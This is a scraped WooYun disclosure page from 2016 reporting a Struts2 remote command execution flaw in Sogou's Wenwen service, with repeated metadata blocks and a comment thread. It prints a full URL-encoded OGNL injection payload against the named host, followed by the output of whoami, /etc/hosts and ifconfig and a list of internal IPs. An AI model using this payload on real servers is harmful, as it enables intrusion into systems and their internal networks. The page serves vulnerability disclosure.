搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170574

漏洞标题：搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

漏洞作者：猪猪侠

提交时间：2016-01-17 13:07

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-17：细节已通知厂商并且等待厂商处理中
2016-01-17：厂商已经确认，细节仅向厂商公开
2016-01-27：细节向核心白帽子及相关领域专家公开
2016-02-06：细节向普通白帽子公开
2016-02-16：细节向实习白帽子公开
2016-02-27：细节向公众公开

简要描述：

搜狗搜索(问问系统)(wenen.sogou.com)存在远程命令执行漏洞，可穿透边界防火墙进入内网，听说你们被腾讯搜狗了，在不在腾讯内网呢？

详细说明：

#1 漏洞描述(st2命令执行)
地址：http://mock.wenwen.sogou.com/org/index.do

漏洞证明：

#2 利用

http://mock.wenwen.sogou.com/org/index.do?redirect%3A%24%7B%23res%3D%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2C%23res.setCharacterEncoding(%22UTF-8%22)%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ringzero%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B9%5D%2C%23d.read(%23e)%2C%23res.getWriter().println(%23e)%2C%23res.getWriter().flush()%2C%23res.getWriter().close()%7D

whoami
====================================================================================================================================
snswenwen
cat /etc/hosts
====================================================================================================================================
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
10.134.9.45             sjs_9_45.sogou-in.domain        sjs_9_45
/sbin/ifconfig -a
====================================================================================================================================
eth0      Link encap:Ethernet  HWaddr 5C:F3:FC:A7:04:E8  
          inet addr:10.134.9.45  Bcast:10.134.15.255  Mask:255.255.248.0
          inet6 addr: fe80::5ef3:fcff:fea7:4e8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:398187733 errors:0 dropped:0 overruns:0 frame:0
          TX packets:128375033 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:36697666297 (34.1 GiB)  TX bytes:20420497771 (19.0 GiB)
          Memory:92a60000-92a80000 
eth1      Link encap:Ethernet  HWaddr 5C:F3:FC:A7:04:E9  
          inet addr:10.144.9.45  Bcast:10.144.15.255  Mask:255.255.248.0
          inet6 addr: fe80::5ef3:fcff:fea7:4e9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1496542708 errors:0 dropped:0 overruns:0 frame:0
          TX packets:753954233 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:154726879148 (144.1 GiB)  TX bytes:178253899801 (166.0 GiB)
          Memory:92a20000-92a40000 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:171894323 errors:0 dropped:0 overruns:0 frame:0
          TX packets:171894323 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24459559582 (22.7 GiB)  TX bytes:24459559582 (22.7 GiB)
usb0      Link encap:Ethernet  HWaddr 5E:F3:FC:A7:04:EC  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
? (10.144.15.252) at d8:67:d9:6e:5c:c1 [ether] on eth1
? (10.134.15.254) at 00:00:0c:07:ac:65 [ether] on eth0
? (10.134.15.250) at 70:e2:84:07:5a:ac [ether] on eth0
? (10.144.15.254) at 00:00:0c:07:ac:c9 [ether] on eth1

#3 发几个内网IP证明

#	IP
1	10.152.91.48
2	10.152.107.41
3	10.149.29.56
4	10.144.77.59
5	10.153.18.116
6	10.144.86.83

修复方案：

升级呗，难道关闭服务器不成？

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-01-17 20:59

厂商回复：

感谢支持

漏洞评价：

评价

2016-01-17 13:07 | onpu ( 普通白帽子 | Rank:167 漏洞数:37 )

前排关注
2016-01-17 13:09 | FwqAdmin ( 路人 | Rank:9 漏洞数:4 )

火钳刘明
2016-01-17 13:09 | Submit ( 普通白帽子 | Rank:527 漏洞数:120 | )

真是够6
2016-01-17 13:10 | 猪猪侠 ( 核心白帽子 | Rank:3846 漏洞数:296 | 你都有那么多超级棒棒糖了，还要自由干吗？)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 13:10 | 猪猪侠 ( 核心白帽子 | Rank:3846 漏洞数:296 | 你都有那么多超级棒棒糖了，还要自由干吗？)

收购
2016-01-17 13:15 | scanf ( 核心白帽子 | Rank:1423 漏洞数:203 | 。)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 13:17 | HackBraid ( 核心白帽子 | Rank:1850 漏洞数:296 | 风暴网络安全空间：http://www.heysec.or...)

默默给猪哥点个赞
2016-01-17 13:25 | 90Snake ( 普通白帽子 | Rank:148 漏洞数:49 | 人如果没有梦想，跟咸鱼有什么分别)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 13:29 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:63 | 潜心代码审计。)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 13:35 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟，菜渣，菜呀！)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 13:36 | 万年死宅 ( 实习白帽子 | Rank:48 漏洞数:20 | 让生命活出精彩！)

大牛好，火钳留名
2016-01-17 13:36 | 泳少 ( 普通白帽子 | Rank:233 漏洞数:81 | ★ 梦想这条路踏上了，跪着也要...)

你这语文……
2016-01-17 13:51 | 随风的风 ( 普通白帽子 | Rank:211 漏洞数:76 | 微信公众号：233sec 不定期分享各种漏洞思...)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 13:51 | secart ( 路人 | Rank:27 漏洞数:5 | 这个人很懒，什么都没留。)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 13:53 | Azox佐熙 ( 路人 | Rank:1 漏洞数:1 | 我就混个脸熟)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 14:08 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效，坚持好的习惯千万不要放弃)

恶趣味。。。
2016-01-17 14:13 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 14:15 | 偶然 ( 普通白帽子 | Rank:282 漏洞数:72 | 我是天空里一片云。)

听说你们被腾讯搜狗了，在不在腾讯内网呢？
2016-01-17 14:48 | __Lee_ ( 路人 | Rank:26 漏洞数:7 | 相信未来，坚持梦想)

666
2016-01-17 15:35 | 爱上平顶山 ( 核心白帽子 | Rank:2981 漏洞数:591 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

666666
2016-01-17 18:55 | 大表哥 ( 路人 | Rank:0 漏洞数:1 | 乌云第一菜鸟，从不提交洞洞)

爱上猪猪侠
2016-01-27 09:31 | 情小北 ( 路人 | Rank:15 漏洞数:7 | 那时候我们还年轻,所以任由时光作渡.)

火前留名

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170574

漏洞标题：搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

相关厂商：搜狗

漏洞作者：猪猪侠

提交时间：2016-01-17 13:07

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170574

漏洞标题：搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

相关厂商：搜狗

漏洞作者： 猪猪侠

提交时间：2016-01-17 13:07

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0170574"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云